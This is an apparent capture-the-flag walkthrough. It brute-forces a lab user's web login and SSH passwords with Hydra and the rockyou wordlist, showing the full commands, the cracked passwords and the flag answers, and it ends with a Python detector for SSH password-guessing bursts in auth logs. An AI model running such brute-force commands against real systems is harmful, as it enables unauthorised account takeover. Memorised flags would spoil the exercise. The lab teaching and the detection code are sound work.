Info
Theory: Hydra.
Use Hydra to Bruteforce Molly’s Web Password. What is Flag 1?
Use the following command:
sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.67.3 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
Output:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-25 12:01:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.67.3:80/login:username=^USER^&password=^PASS^:F=incorrect
[80][http-post-form] host: 10.10.67.3 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-25 12:01:56
Log in and retrieve the flag.
Success
THM{2673a7dd116de68e85c48ec0b1f2612e}
Use Hydra to Bruteforce Molly’s SSH Password. What is Flag 2?
Use the following command:
sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.67.3 ssh
Output:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-25 12:05:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.67.3:22/
[22][ssh] host: 10.10.67.3 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-25 12:05:32
Log in and retrieve the flag:
Success
THM{c8eeb0468febbadea859baeb33b2541b}
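The SSH run above leaves a recognisable trail on the target: a burst of failed password attempts for molly from one source, then an accepted one. The following is an added example, not part of the original write-up, that flags that pattern in OpenSSH auth log lines. The sample log, the 192.0.2.10 and 198.51.100.7 addresses, the function name find_guessed_logins and the min_failures threshold are constructed for illustration, and the lines are assumed to be in chronological order.

```python
import re
from collections import defaultdict

# Constructed sample of OpenSSH auth log lines (not captured from the lab host).
# 192.0.2.10 stands in for the machine running the password guesser.
SAMPLE_LOG = "\n".join(
    [f"Mar 25 12:05:{20 + i} target sshd[{2100 + i}]: Failed password for molly "
     f"from 192.0.2.10 port {40100 + i} ssh2" for i in range(6)]
    + ["Mar 25 12:05:27 target sshd[2107]: Accepted password for molly "
       "from 192.0.2.10 port 40107 ssh2",
       # One mistyped password followed by a normal login: must not be flagged.
       "Mar 25 12:09:02 target sshd[2150]: Failed password for alice "
       "from 198.51.100.7 port 51000 ssh2",
       "Mar 25 12:09:10 target sshd[2151]: Accepted password for alice "
       "from 198.51.100.7 port 51002 ssh2"]
)

# Matches sshd password results, including failures for non-existent users.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_guessed_logins(log_text, min_failures=5):
    """Return (ip, user, failures) for every accepted password that follows
    at least min_failures failed passwords for that user from the same IP."""
    failures = defaultdict(int)   # (ip, user) -> failures since last success
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
            continue
        # Accepted password: report it if a guessing burst preceded it.
        if failures[key] >= min_failures:
            hits.append((m["ip"], m["user"], failures[key]))
        failures[key] = 0         # a success resets the counter either way
    return hits

if __name__ == "__main__":
    for ip, user, count in find_guessed_logins(SAMPLE_LOG):
        print(f"{user} logged in from {ip} after {count} failed passwords")
```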